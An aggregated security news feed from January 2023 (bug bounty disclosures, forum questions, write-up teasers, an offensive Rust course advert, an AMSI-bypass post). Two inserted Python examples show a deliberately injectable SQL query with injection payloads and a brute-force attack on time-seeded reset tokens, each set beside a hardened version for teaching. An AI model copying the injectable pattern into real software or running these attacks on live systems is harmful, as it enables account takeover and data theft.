    As-salamu alaykum everyone! Hope you’re doing well. I’m gonna explain one of my latest findings on a Web Site’s API Continue reading on Medium »
    ATTACKING ACTIVE DIRECTORY
    WITH LINUX Continue reading on Medium »
    Bug hunting: Open access to S3 bucket
    This blog post explains how I discovered a bug in a well-known ride-sharing platform that allowed me to access the firm’s assets stored in… Continue reading on Medium »
    My recon process (command-line)
    My recon methods and tools I use in Linux Continue reading on Medium »
  • Open

    The dark side of Gmail
    submitted by /u/osint_matter [link] [comments]
    Releasing hermes-dec, an open-source disassembler and decompiler for the React Native Hermes bytecode
    submitted by /u/marin-m [link] [comments]
    Unwrapping Ursnif's Gifts
    submitted by /u/TheDFIRReport [link] [comments]
    Practical Example Of Client Side Path Manipulation
    submitted by /u/Gallus [link] [comments]
    Reverse Engineering TikTok's VM Obfuscation (Part 2)
    submitted by /u/Gallus [link] [comments]
    Vulnerable Jenkins plugins exploitation
    submitted by /u/ntknn [link] [comments]
    How To Attack Admin Panels Successfully Part 2
    submitted by /u/banginpadr [link] [comments]
  • Open

    Vaporwave wallpapers & gifs
    https://five.sh/files/vaporwave/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    WordPress Vulnerability – Since 2017?
    Article URL: https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/ Comments URL: https://news.ycombinator.com/item?id=34314499 Points: 1 # Comments: 1
  • Open

    Beginners Guide to Container Security
  • Open

    Geolocation of an execution in Baghlan, Afghanistan
    Warning: Please be advised that this guide will explain how to geolocate an execution that was done by the Taliban in Baghlan, Afghanistan… Continue reading on Medium »
    FREE OSINT TOOLS
    Continue reading on Medium »
  • Open

    bypass two-factor authentication in Android apps and web
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1747978 - Bounty: $1000
    Possibility to delete files attached to deck cards of other users
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1755555 - Bounty: $500
    Missing character limitation allows generating a database error
    Nextcloud disclosed a bug submitted by error_2001: https://hackerone.com/reports/1596059
    Passcode bypass on Talk Android app
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1784645
  • Open

    SecWiki News 2023-01-09 Review
    AspectJWeaver exploit chain bypasses serialKiller by SecIN Community; Measuring Russia's large-scale blocking of Twitter by Avenger. For more of the latest articles, visit SecWiki
  • Open

    TryHackMe | Advent of Cyber Part 3
    Hi there! In this article, we’ll continue “Advent of Cyber 2022” room in TryHackMe together. Continue reading on Medium »
    Steel Mountain
    Reconnaissance Continue reading on Medium »
    Internal
    Reconnaissance Continue reading on Medium »
    Ignite
    Reconnaissance Continue reading on Medium »
    ACTIVE DIRECTORY 201 — BREACHING A DOMAIN
    Well done on setting up an Active Directory Lab. Continue reading on Medium »
    HackPark
    Reconnaissance Continue reading on Medium »
  • Open

    Disclosing a New Vulnerability in JWT Secret Poisoning (CVE-2022-23529)
    We discovered a new high-severity vulnerability (CVE-2022-23529) in the popular JsonWebToken open source project. The post Disclosing a New Vulnerability in JWT Secret Poisoning (CVE-2022-23529) appeared first on Unit 42.
  • Open

    FreeBuf Morning Report | Qualcomm Snapdragon vulnerabilities affect Lenovo and other devices; Russian hacker group attacks US nuclear laboratories
    Building data security for digital government has introduced many new technologies, models, and systems.
    Smart contract security audit primer: sleight of hand
    How to identify malicious code hidden in a contract?
    An overview of China's cybersecurity laws and regulations in 2022 | FreeBuf year in review
    This article looks at which laws, regulations, rules, and guidance opinions were issued for the cybersecurity industry in 2022.
    Red team penetration project: Raven-1
    Introduction: this project is the second by author William McCann; the goal is to obtain root privileges and find the text in flag.txt. The project is a must-do lab environment for OSCP exam training, and the author rates it as intermediate difficulty. Whether you are a beginner with no background, someone with some basics, or even an advanced practitioner, you can learn some red team knowledge from the techniques in this article. From start to finish the project uses information gathering -> port enumeration -> PHPMaile
    Using a service mesh to improve application and network security
    Next-generation technologies such as cloud native and microservices have erased the perimeter. In the past, a company's assets were separated from the outside world by a clear boundary. Now there is no "inside" versus "outside"; everything is considered "outside". A larger attack surface means more opportunities for cybercriminals. How, then, can enterprises reduce the attack
    Personal information of some Air France and KLM customers stolen
    Air France and KLM have notified Flying Blue travellers that some of their personal information may have been exposed.
    ThreadLocal source code analysis and practical application
    A variable we create can be accessed and modified by any thread, whereas a variable created with ThreadLocal can only be accessed by the current thread; other threads cannot access or modify it.
    Data from multiple UK schools leaked on a large scale; the education sector becomes a primary ransomware target
    Following attacks on universities in 2022, data from 14 UK schools has been leaked online by hackers.
    "Cybersecurity Standards Practice Guide: Verification of the Effect of Partial Contouring of Exterior Vehicle Imagery (Draft for Comment)" released
    The Guide sets out the process, methods, and verification criteria for checking the effect of contouring faces and license plates in exterior vehicle imagery.
    Jingyin platform: exploring SCRM's telemarketing system together
    What is telemarketing? Is it just agents picking up the phone and calling customers? No no no. Let's step into the Jingyin platform's telemarketing system. The Jingyin platform has been under construction since early 2020, and over the past two-plus years it has had its ups and downs, with experience gained and lessons learned.
  • Open

    Local to Domain
    So, busy with an engagement and managed to get onto a server with local access only. Mimikatz and dumping hashes only shows local account information. Same result with Mimikatz elevation requests. Kerberoast shows no info as it is being run under a local user. Any other tips on how one can elevate from local to domain? submitted by /u/0xDumbAss [link] [comments]
  • Open

    Exploring an exploitation approach for a Foxit Reader vulnerability
    Author: Li Shuang, 360 Vulnerability Research Institute. Original link: https://vul.360.net/archives/648 Background: Foxit Reader (formerly Foxit PDF Reader) is software for reading PDF files, developed by Fujian Foxit Software. In Adobe Reader and older versions of Foxit Reader, a JS ArrayBuffer is typically used to lay out memory and ultimately achieve arbitrary code execution...
  • Open

    HTML injection in an email template
    Send emails on behalf of a company? Here’s how I found this vulnerability in several large companies allowing me to easily earn bounties. Continue reading on Medium »
    How To Attack Admin Panels Successfully Part 2
    Not Attacking Web Apps Admin Panels The Right Way? Continue reading on Geek Culture »
    XSS Bypass for Rich Text Editors
    Tips for bypassing XSS filters in rich text editors like TinyMCE Continue reading on The Gray Area »
    Subdomain Scanning 101: What You Need to Know
    Subdomain scanning is a process of identifying subdomains for a given domain. This can be useful for a number of reasons, such as… Continue reading on Medium »
    How to automate your initial recon and extend ASM using Sub-Scout
    This blog explains how Sub-Scout works and how can you use it in your recon workflow. Continue reading on Medium »
    Algorand: Bug Bounty Program, More Than $2 Million Allocated as Rewards
    Algorand, a layer-1 blockchain network with a proof-of-stake consensus mechanism that is demonstrably environmentally friendly and carbon-negative, has… Continue reading on Medium »
    My First Bug Bounty Reward : $100 in 5 min
    Hello everyone, Continue reading on Medium »
    How to Get Started in Bug Bounty by ChatGPT
    The blog that ChatGPT wrote for me on bug bounty Continue reading on Medium »
    —
    Want to learn or sharpen your skills in API pentest? Now is the time Continue reading on Medium »
  • Open

    Look Ahead: What Network Security Will Look Like in 2023
    Network security is an ever-evolving field, and it’s important to stay up to date on the latest trends in order to protect your data and… Continue reading on Medium »
    SPY NEWS: 2023 — Week 1
    Summary of the espionage-related news stories for the Week 1 (January 1–7) of 2023. Continue reading on Medium »
    Hacktoria Follow The Black Rabbit Write up
    Attempt the challenge first before read this write up, thank you :) Continue reading on Medium »
  • Open

    Red Team Fundamentals
    Introduction Continue reading on Medium »
    Persistence ways
    Gaining continued access to a computer system or network that has been compromised is known as persistence. It requires bypassing security… Continue reading on Medium »
    Querier
    Reconnaissance Continue reading on Medium »
    Alfred
    Reconnaissance Continue reading on Medium »
    Bastard
    Reconnaissance Continue reading on Medium »
  • Open

    Ultimate Windows Wallpaper Pack, a collection of 12000+ official Windows wallpapers from 1990 to present
    submitted by /u/fusoxide [link] [comments]
    Cat gifs and images
    https://welovecatsandkittens.com/wp-content/uploads/ https://www.tonictutor.com/app/webroot/img/cats/ https://fun.bgjargon.com/lolcats/ submitted by /u/Waste-Release-6235 [link] [comments]
    Midi music
    https://nlp.biu.ac.il/~amit/datasets/Midi/MidiCollection/ https://www.lilesnet.com/music/midi/ https://modland.ziphoid.com/incoming/vault/MIDI/ https://www.vgmusic.com/music/console/ http://gansweith.freehostia.com/midi/ submitted by /u/Waste-Release-6235 [link] [comments]
    Looking for a directory link that was posted
    There was a link that posted to an OD or possibly a Google drive of a bunch of DJ mixes. It was some time in the past year but I am unable to find it and I do not have it in my link directory. Shot in the dark but does this ring a bell for anyone else? I swear I commented on the post but I am not even able to find a comment. submitted by /u/belly_hole_fire [link] [comments]
    How to view most popular videos of a youtube channel during specific time period (e.g. past year)?
    Do you see that you can view top posts of a subreddit during specific time period? Does Youtube have similar thing for a channel exclusively? Is there any trick to do this? submitted by /u/Almangool [link] [comments]
  • Open

    Interactive Risk Explorer for Understanding Software Supply Chain Attacks
    submitted by /u/ewok94301 [link] [comments]
    Bring your own vulnerable driver to the exploit party: Understanding BYOVD Attacks
    submitted by /u/achilles4828 [link] [comments]
    Analyzing CVE-2022-46630 (DLL Hijacking in Squirrel.Windows)
    submitted by /u/DLLCoolJ [link] [comments]
    Strategies for effective CSRF mitigation
    submitted by /u/DeliveryTypical [link] [comments]
  • Open

    Simulator project - Simulated SQL Injection vulnerability
    Hello, I am working on a project, creating a training simulator dedicated to SQL Injection training tasks. The main logic is coded in Python and the database that needs to be compromised in the tasks is PostgreSQL. However, when I try to send a request to the API on the backend where I put the entire input into the query, for example: f"SELECT * FROM users WHERE username= '{username}';" As input (for dynamic param "username") I used for testing for example: '; SELECT * FROM users; -- and when I execute via command from psycopg2 lib, it returns an error, and when I try it in the console in my local PostgreSQL database, it works correctly. Does anyone know how to approach such simulated SQL injection requests? Am I using the wrong library or what do you think could be wrong? Thanks for every answer. submitted by /u/Anonym_DumboOctopus [link] [comments]
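Added example (not the poster's code): the f-string lookup from the post next to a parameterized one, run against an in-memory SQLite table constructed here so it works offline without PostgreSQL or psycopg2. SQLite's execute() also refuses a stacked second statement, so the last helper makes that driver-level behaviour visible; the table rows and function names are this example's own.

```python
import sqlite3

# Constructed sample rows for this example (not the post's database).
USERS = [("alice", "s3cr3t"), ("bob", "hunter2"), ("admin", "correct-horse")]


def setup_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Deliberately injectable: user input is spliced into the SQL text with an
    f-string, the same pattern as in the post. A quote in the input ends the
    string literal and the rest of the input becomes SQL syntax."""
    query = f"SELECT username FROM users WHERE username = '{username}' ORDER BY rowid;"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the driver binds the value separately from the statement, so a
    quote in the input is just a character in the value."""
    query = "SELECT username FROM users WHERE username = ? ORDER BY rowid;"
    return [row[0] for row in conn.execute(query, (username,))]


def stacked_statement_accepted(conn: sqlite3.Connection, username: str) -> bool:
    """Whether execute() will run the injected text when it carries a second
    statement. sqlite3's execute() rejects more than one statement per call
    (executescript() would run them), which is the kind of driver-level
    difference that makes a stacked payload behave differently in a client
    library than in an interactive console."""
    query = f"SELECT username FROM users WHERE username = '{username}';"
    try:
        conn.execute(query)
        return True
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return False
```

The tautology payload `' OR '1'='1` returns every row through the vulnerable function and nothing through the parameterized one; the stacked payload from the post is rejected by execute() before it runs.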
    transitioning from IT and OT Cybersecurity
    Questions for IT cybersecurity experts who extended their dominance on OT Security, is SANS GISCP recommended for someone who wants to be good at OT security domain? Any suggested how to start and certification to target for? submitted by /u/junostik [link] [comments]
    Books for finding C/C++ vulnerabilties?
    I have already read Secure Coding in C and C++ by SEI and Hacking: The Art of Exploitation by Erickson. What other books are out there for someone who wishes to break into vulnerability research? I'm specifically interested in finding vulnerabilities in open-source C and C++ code. submitted by /u/jafarlihi [link] [comments]
    Are CSPRNGs even hackable in any way? I've only found research on basic PRNGs
    You would think academia would have theoretical attacks against CSPRNGs by now, but it seems like it's deterministic to an extent and can be broken if you can replicate the original seeding. The best CSPRNGs feed in data from things like Linux's /dev/urandom, which the man pages state is "environmental noise". If you do OSINT on the company you're trying to hack, say in this example it's a web application with a heavily fortified password reset token algorithm using a CSPRNG that feeds in data from /dev/urandom. Now say you find out they're using a Dell OptiPlex server rack and you know the typical CPU and mobo setup, even down to the exact RAM sticks. Couldn't the attacker replicate the same environmental noise by setting up an environment as close as possible to the target's server environment and run /dev/urandom, getting a bunch of similar seeds, and one of these seeds is bound to allow you to predict the next reset token? Best example I can think of, but surely CSPRNGs must have some sort of flaw, and I haven't even touched upon the various types of side-channel attacks like differential fault analysis by lagging the server or injecting predictable faults into the web app to get consistent enough environmental noise to get a predictable seed to appear, allowing token prediction that way. The second attack is theoretically possible because it's a known flaw that when a Linux box is first booted up the first few numbers from /dev/urandom have the lowest entropy, but I believe this issue was fixed; I just remember reading it somewhere. submitted by /u/TheCrazyAcademic [link] [comments]
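Added example, not from the post: a password-reset token built from a PRNG seeded with guessable state (the issue time in seconds) next to one drawn from the OS CSPRNG through Python's secrets module, which reads os.urandom. The attacker routine regenerates the candidate token for every seed in a time window and tries each against the redeem check, which is the "replicate the seeding" attack the post describes; it has nothing to search when the token came from the CSPRNG. The ResetService class, the seed window and the timestamp are constructed for this illustration.

```python
import random
import secrets


def weak_reset_token(issued_at: int) -> str:
    """Insecure: a non-cryptographic PRNG seeded with the issue time in whole
    seconds. Anyone who can guess the seed regenerates the same token."""
    rng = random.Random(issued_at)
    return rng.getrandbits(128).to_bytes(16, "big").hex()


def strong_reset_token() -> str:
    """Secure: secrets draws from os.urandom, so there is no seed to reconstruct."""
    return secrets.token_hex(16)


class ResetService:
    """Hypothetical password-reset endpoint used only for this illustration."""

    def __init__(self, weak: bool):
        self.weak = weak
        self.current = None

    def issue(self, now: int) -> str:
        """Issue a token for the victim's account. It goes to the victim's
        mailbox, so the attacker only learns roughly *when* it was issued."""
        self.current = weak_reset_token(now) if self.weak else strong_reset_token()
        return self.current

    def redeem(self, token: str) -> bool:
        """Constant-time comparison against the outstanding token."""
        return self.current is not None and secrets.compare_digest(token, self.current)


def brute_force_seed(service: ResetService, approx_time: int, window: int):
    """Attacker: regenerate the token for every seed within +/- window seconds
    of the guessed issue time and submit each one. Returns the seed that was
    accepted, or None when no candidate in the window works."""
    for seed in range(approx_time - window, approx_time + window + 1):
        if service.redeem(weak_reset_token(seed)):
            return seed
    return None
```

With a one-hour window the attacker submits at most 7201 candidates against the weak service and recovers the exact seed; against the secrets-backed service every candidate fails, because the token was never a function of any seed the attacker can enumerate. A real endpoint would also rate-limit and expire tokens, which this toy omits on purpose.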
  • Open

    A Detailed Guide on Kerbrute
    Background Kerbrute is a tool used to enumerate valid Active Directory user accounts that use Kerberos pre-authentication. Also, this tool can be used for password
  • Open

    Mac Forensics - SIP
    Hello everyone, I'm a forensics analyst and working on a case where System Integrity Protection was disabled on a Mac. We are looking for evidence indicating the user of the system manually disabled it. Any ideas on where to start? Thanks in advance! submitted by /u/clew161990 [link] [comments]
    I’m just about to finish my Bachelor Honours in Forensic Security degree, what certs should I add to my CV?
    What will help buff out my CV, I currently have 0 certifications and would ideally like to try and get some before going into the forensic job world, try and help give me an advantage submitted by /u/fgtethancx [link] [comments]
  • Open

    Offensive Rust
    OFFENSIVE RUST Launched! Want to level up your offensive security game? Check out our new Rust for Offensive Security course! From Rust basics to advanced techniques like Active Directory enumeration, reverse shells, and hiding processes, we've got you covered. Enroll now to take your skills to the next level! ⚙️ Rust Basics ⚙️ Advanced Rust ⚙️ Enumerating Active Directory ⚙️ Executing OS Commands ⚙️ A Rusty reverse shell ⚙️ Introduction to WINAPI ⚙️ Shellcode Injection ⚙️ DLL Injection ⚙️ Windows Named Pipes ⚙️ DLL Proxying ⚙️ Writing our Reflective Loader ⚙️ Process Hollowing ⚙️ Process Doppelganging ⚙️ Patching AMSI ⚙️ API Hashing ⚙️ API Hooking ⚙️ Hooking IAT ⚙️ Hiding any process from task manager ⚙️ NTFS Transactions https://redteamsorcery.teachable.com/p/offensive-rust infosec #cybersecurity #redteam #malware submitted by /u/nikkithegr8 [link] [comments]
  • Open

    SecWiki News 2023-01-08 Review
    Playing with CodeQLpy: practical code-audit case studies by ourren; code-inspector: a Java code-audit tool based on bytecode analysis by 路人甲; Patch diff an old vulnerability in Synology NAS by 路人甲; Automated code auditing in practice with GitLab and Fortify by 路人甲. For more of the latest articles, visit SecWiki
  • Open

    Race condition in joining CTF group
    HackerOne disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1540969 - Bounty: $500
  • Open

    Vulnerability Research Digest – Issue 1 (macOS/iOS in 2022)
    Article URL: https://alexplaskett.github.io/macos-ios-security-research/ Comments URL: https://news.ycombinator.com/item?id=34297792 Points: 1 # Comments: 0
  • Open

    JNDI Injection Series: RMI Vector - Insecure Deserialization
    No content preview
  • Open

    curl file writing susceptible to symlink attacks
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1814824
    libssh backend CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256 validation bypass
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1825377
    HEIC image preview can be used to invoke Imagick
    Nextcloud disclosed a bug submitted by lukasreschkenc: https://hackerone.com/reports/1261413
  • Open

    GUARDARA 0.9.9 Available with Web Service Testing
    submitted by /u/JohnKeymanUK [link] [comments]
    VSCode Supply Chain Attacks: Protect Your IDE from Malicious Extensions
    submitted by /u/gfdgfbal [link] [comments]
    connmap now works with all DE/WM! Desktop widget that shows location of your current TCP peers on a world map in real-time.
    submitted by /u/jafarlihi [link] [comments]
    Reflections on Trusting VEX (or when humans can improve SBOMs)
    submitted by /u/dlorenc [link] [comments]
    Setting up your bug bounty scripts with Python and Bash — The subdomain monitoring bot
    submitted by /u/Plenty-Mix-2 [link] [comments]
    Manipulating AES Traffic using a Chain of Proxies and Hardcoded Keys
    submitted by /u/Gallus [link] [comments]
  • Open

    Open Redirect Attack #learn365days
    An open redirect is an endpoint on a vulnerable website where a web page takes an unvalidated user-submitted… Continue reading on Medium »
    How to perform dynamic analysis of a smart contract with Myth
    Myth is a tool developed by Consensys that does dynamic analysis of a Solidity smart contract. It has a paid version called MythX and… Continue reading on Medium »
    How to begin Cybersecurity in 2023 ?
    So, You wanna be HACKER. Of course, so you have stumbled upon this medium post. Before diving deep into the road map or content. I just… Continue reading on Medium »
    4 Reasons you are not able to find bugs
    The most important part of finding bugs is scanning, Continue reading on Medium »
    The Dangers of Remote Code Execution (RCE)
    Remote Code execution vulnerabilities are particularly dangerous, allowing attackers to take complete control of computers. Continue reading on The Gray Area »
  • Open

    AppSec/RedTeam/Pentester
    I'm 23 and I'm attending an evening computer science high school made for adults who dropped out of their studies in adolescence. Cybersecurity seems very interesting to me, so I'm trying to do some research about different job roles. I discovered that cybersecurity isn't a first job, so my intention is to find a job as a Java backend developer and, after a few years of experience, look for security jobs. Of all the roles I have seen, the ones I am most curious about are the ones mentioned in the title. I don't understand how they differ from each other; are they synonyms for the same role? With a few years of experience as a backend developer can you get into these roles? Do you have advice on the top people in this area to follow on Twitter? Do you know of communities? Conferences to participate in? submitted by /u/HelloWorldCLang [link] [comments]
    why don't enterprises, specifically schools, implement this?
    So I found an article that explains how to prevent keyloggers on Windows, Mac, and Linux: https://www.makeuseof.com/tag/disable-usb-storage-devices/ I know there is already software out there for software keyloggers (i.e. DeepFreeze) but this would literally block any devices aside from the keyboard or mouse and the settings to do it are there. Wouldn't this be good to prevent students from cheating in schools? I had a conversation with a physics teacher about this but I am an IT student who also studies cybersecurity in his spare time and maybe there's something I'm not getting but if a setting is this easy why is it not implemented? submitted by /u/notburneddown [link] [comments]
    Deauth Packet signal detection for specified locations
    Quick question regarding this. If someone were to send packets to capture a handshake and isn’t actively transmitting deauth packets, is it still possible to detect where exactly the attack is coming from? I’m aware that wireshark can detect the signal strength of the packets but ultimately wouldn’t you need a spectrum analyzer to see exactly where it’s coming from? Also what if they put a piece of tinfoil or something to weaken/strengthen the signal to make it appear further/closer to the device than it actually is. Cheers. submitted by /u/Downtown-Sprinkles38 [link] [comments]
  • Open

    SecWiki News 2023-01-07 Review
    Analysis of 2022 cybersecurity financing in China by ourren. For more of the latest articles, visit SecWiki
  • Open

    Photo Geolocation, pt. II
    Two investigations for you, ladies and gentlemen. Continue reading on Medium »
  • Open

    Is CHFI the CEH of the forensics world?
    I ask because I have free training and vouchers available for CHFI. I'm already in a forensics role with just a university certificate but no industry certs. I want something to add to my knowledge depth that comes with credentials. submitted by /u/dgree049 [link] [comments]
    The Linux Process Journey — “kdevtmpfs”
    submitted by /u/boutnaru [link] [comments]
  • Open

    Modern Windows Command & Control / Implants
    submitted by /u/dmchell [link] [comments]
  • Open

    Anonymity and Privacy
    During a Red Team campaign it is important to make sure the connections are robust and anonymous enough to avoid being… Continue reading on Medium »
  • Open

    Old archive of stuff
    https://ftp.funet.fi ​ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    PHP Deserialization from 0 to 1
    A summary of PHP deserialization exploitation techniques that covers almost every angle, drawing on many other researchers' articles; corrections are welcome.
  • Open

    Blueprint for All Pentests!
    CyberDucky is ready to hack! Hope you all are having a great year so far. Thank you for all the love. Blueprint for how a pentest is structured! https://youtu.be/6o25auMAVv8 submitted by /u/cyberducky0_0 [link] [comments]

  • Open

    Geolocating an image: explanation.
    The image comes directly from the @quiztime account on Twitter. I have no clues, only this image. Continue reading on Medium »
  • Open

    Bypassing CrowdStrike Falcon with Pracsec's New AMSI Bypass
    I took Pracsec's new AMSI bypass method and walked PowerUp by Crowdstrike Falcon. Check it out! https://www.youtube.com/watch?v=5e0uDVE35mk https://github.com/pracsec/AmsiBypassHookManagedAPI submitted by /u/Infosecsamurai [link] [comments]
    HTML Smuggling: Recent observations of threat actor techniques
    submitted by /u/Trop_Chaud [link] [comments]
    Is Your MS Exchange Server Safe?
    submitted by /u/cheeztoshobo [link] [comments]
  • Open

    I made an Open Source Browser extension to aid in Threat Investigations!
    submitted by /u/zack7601 [link] [comments]
    TruffleHog Now Scans CircleCI log outputs for passwords/credentials
    submitted by /u/wifihack [link] [comments]
    udon: A simple tool that helps to find assets/domains based on the Google Analytics ID.
    submitted by /u/BananaBounty [link] [comments]
    I scanned every package on PyPi and found 57 live AWS keys
    submitted by /u/Most-Loss5834 [link] [comments]
    LastPass Breach - What went wrong?
    submitted by /u/GelosSnake [link] [comments]
    Latest activity from Turla {Mandiant}
    submitted by /u/EspoJ [link] [comments]
    How the Lastpass Breach affects Lastpass SSO
    submitted by /u/csanders_ [link] [comments]
    Fetch Diversion
    submitted by /u/albinowax [link] [comments]
    The Mac Malware of 2022
    submitted by /u/KolideKenny [link] [comments]
    Variant analysis of CVE-2022-3515 affecting libksba, which resulted in CVE-2022-47629
    submitted by /u/Gallus [link] [comments]
    Announcing the Ronin 2.0.0 Open Beta. Ronin is a free and Open Source Ruby toolkit for security research and development.
    submitted by /u/postmodern [link] [comments]
  • Open

    Container security interview
    As the title says, I have an interview for a container security role. I just wanted to pick your brain on what I should focus on on the technical side of things. As for me, I have experience in vulnerability management, secops, and a part-time role on a k8s team. submitted by /u/hannibal_the_general [link] [comments]
    Are randomish passphrase passwords equally secure to random?
    After this latest breach, I'm ditching LastPass. I have a pretty good master password that is 12 random characters, but I'm fed up with company. I'm going to try Bitwarden, and I'm going to use a passphrase as my master password. My question is, would a passphrase following an acronym be just as secure as random words? For example, if my name was Casey, would the phrase "curfew attitude scored eskimo yelling" be vulnerable? submitted by /u/MegaRadCoolDad [link] [comments]
    Employee syncing files with ex employee/competitor?
    Hello, I'm looking for some opinions on this subject. So we had a guy who worked as a coordinator for our company for 23 years and then quit to go start up his own company that is exactly the same. We are a company that has government contracts, as we are a subcontractor. So the woman who does the background checks and payroll, who has also been employed with the company for over a decade, let us know this week that she was leaving to go work for his company. Today we found in her deleted folder in her email that she had been sending something to him monthly since September that said "file synchronization", but because the email is deleted, we can't see the whole thing. The first time it said that the synchronization failed, but then it said it was successful, and since then a new email goes each month that says the same thing. We use Outlook, invoicing software and a CRM. Our IT guy is currently looking into it, but in the meantime I just wanted some opinions on what this could be. I think of good potential hires, but why wouldn't she just email him those? Has to be more than that... Thanks in advance! submitted by /u/StreetIndependence79 [link] [comments]
    Would you use ZeroTier in production?
    I'm not exactly concise, so TLDR at the bottom. My situation is that I teach an intro to devops sort of course at a vocational school. At the end of the course my students have to setup an environment with an AD and some clients, document networking and do a bit of python. In relation to this, the students have to setup VPN connectivity for signing on to the AD from remote networks. And this is where my question stems from. A few students have used ZeroTier as a free VXLAN service. I haven't taught this, as anything more than a simple PPTP VPN is extracurricular. I understand why the students have gone this route, I wished we didn't have to deal with 3 layers of NAT at my school, and I get the concept. I'm just not sure if I'd want to use a free service for transporting my traffic, while also providing the software that handles the keys. It just screams of begging to a MitM attack TL;DR: Have you considered/analyzed ZeroTier, or the like, for use in production? submitted by /u/BigDanishGuy [link] [comments]
    I accidentally input my SSN over public wifi. What should I do?
    I was applying for a credit card in Amazon. I put my SSN, number, etc in the form. Later on I realized I wasn't on data but connected in my hospital's guest wifi. Should I be concerned? Please im panicking right now 😭😭😭 submitted by /u/Cute_Tumbleweed3752 [link] [comments]
    Share your Incident Response stories with me
    Hi AskNetSec, I would love to hear from members of this community about times they've been in serious and moderate incidents where services have been hacked, or services have failed. What happened, how you felt at the time, were you the hero? what did you learn? Did you get an rush of energy? I'm not looking for your day to day descriptions of what you do - just stories of real incident - I'd just like to read some stories in this area! submitted by /u/CyberStagist [link] [comments]
  • Open

    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on Medium »
    How I Found My First Vulnerability/Bug Bounty at HackerOne.
    Hi guys! In this article I will talk about how I was able to find my first vulnerability/bug bounty at HackerOne, and I hope you will like… Continue reading on Medium »
    How I Hacked my university’s Lab Portal and gained access to all accounts :)
    A tale of IDOR leads to account takeover!!! Continue reading on Medium »
    Bug Zero at a Glance [Week 31 December–06 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Cross-Site Scripting — XSS [CWE-79]
    Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) Continue reading on Medium »
    Identity-Aware Proxy Misconfiguration- Google Cloud Vulnerability
    First, we need to know what Identity-Aware Proxy (IAP) is and how it works to exploit it… Continue reading on Medium »
    How to use solium (Ethlint) to audit smart contracts
    Ethlint (formerly solium) is a tool that analyze your smart contract for style and security issues. Continue reading on Medium »
    Tired of searching for Bug Bounty Reports
    Here you can Search for any reports you need with your preferences, Nicely categorized and Easy searching. Continue reading on Medium »
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on The Gray Area »
  • Open

    IDOR when editing email leads to Mass Full ATOs (Account Takeovers) without user interaction on https:///
    U.S. Dept Of Defense disclosed a bug submitted by int_lulz: https://hackerone.com/reports/1687415
    Reflected XSS
    U.S. Dept Of Defense disclosed a bug submitted by f6x: https://hackerone.com/reports/1390131
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657033
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657006
    Unauthenticated phpinfo()files could lead to ability file read at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1794884
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1660611
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1660500
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657020
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1657030
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1666002
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1665971
    stored cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1665966
    Sql Injection At
    U.S. Dept Of Defense disclosed a bug submitted by w13d0m: https://hackerone.com/reports/1723896
    Local File Read vulnerability on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by demon1c: https://hackerone.com/reports/1624670 - Bounty: $500
    [] Remote Code Execution at [CVE-2021-44529] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by norwegianwood: https://hackerone.com/reports/1624172 - Bounty: $1000
    SQL Injection at https://.asp () [selMajcom] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1628408
    CSRF to ATO at https:///user/account [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by pwn33d: https://hackerone.com/reports/1624421 - Bounty: $500
    xss on reset password page
    U.S. Dept Of Defense disclosed a bug submitted by 0x53_0x52_0x59: https://hackerone.com/reports/1763404
    XSS via Client Side Template Injection on www./News/Speeches
    U.S. Dept Of Defense disclosed a bug submitted by chef_shell: https://hackerone.com/reports/1736317
  • Open

    E-Discovery Tool Recommendation
